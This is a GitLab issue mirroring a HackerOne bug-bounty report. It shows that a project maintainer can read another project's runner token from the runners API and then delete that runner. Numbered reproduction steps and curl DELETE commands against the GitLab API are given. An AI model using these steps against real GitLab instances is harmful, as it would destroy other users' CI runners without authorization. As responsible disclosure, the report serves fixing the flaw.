Skip to content
GitLab Next
Closed
Issue created by GitLab SecurityBot@gitlab-securitybotReporter

Delete a registered runner as unauthorised user

HackerOne report #767493 by ashish_r_padelkar on 2020-01-03, assigned to @jeremymatos:

Summary

Hello,

This #685239 is fixed as per latest security release here https://about.gitlab.com/blog/2020/01/02/security-release-gitlab-12-6-2-released/ which is basically updating and removing runners as maintainers but this issue is different.

In this case, you as a project maintainer is able to delete registered runner in different project when you don't have rights to do it. This happens when runner is registered by user in separate project and is enabled in project where you have maintainers rights. You then as a project maintainer just have permissions to pause or enable/disable that runner within that project in UI. However, using below API, you can delete this registered runner from different project where you dont have rights.

curl --request DELETE "https://gitlab.example.com/api/v4/runners" --form "token=<authentication_token>"

Steps to reproduce

  1. Create a group and 2 projects within it Project1 & Project2.
  2. As a project maintainer, register a runner in Project1.
  3. When you navigate to Project2, you have the option to enable it ( as you created in project1).
  4. Enable this runner in Project2.
  5. Add one more user as project maintainer in Project2
  6. Login as above user now i.e maintainer in Project2.
  7. Go to https://gitlab.com///-/settings/ci_cd#js-runners-settings. You will see that you can either pause or disable the runner. You will not see Remove Runner option here because this runner is just registered in different project (Project1)where you don't have access.
  8. Now just visit the API https://gitlab.com/api/v4/runners/<ID> . You should see the ID in page itself.
  9. In response, you should see the value of token for this runner . Just copy it and use it in below API to delete this registered runner
curl --request DELETE "https://gitlab.com/api/v4/runners" --form "token=<Token_from_above_response>"

What is the current bug behavior?

Allows unauthorised users to delete registered runner

What is the expected correct behavior?

In my opinion, token value should not be exposed to users in above situations.

Output of checks

This bug happens on GitLab.com and might be on omnibus installations too!

Regards,
Ashish

Impact

Allows unauthorised delete of registered token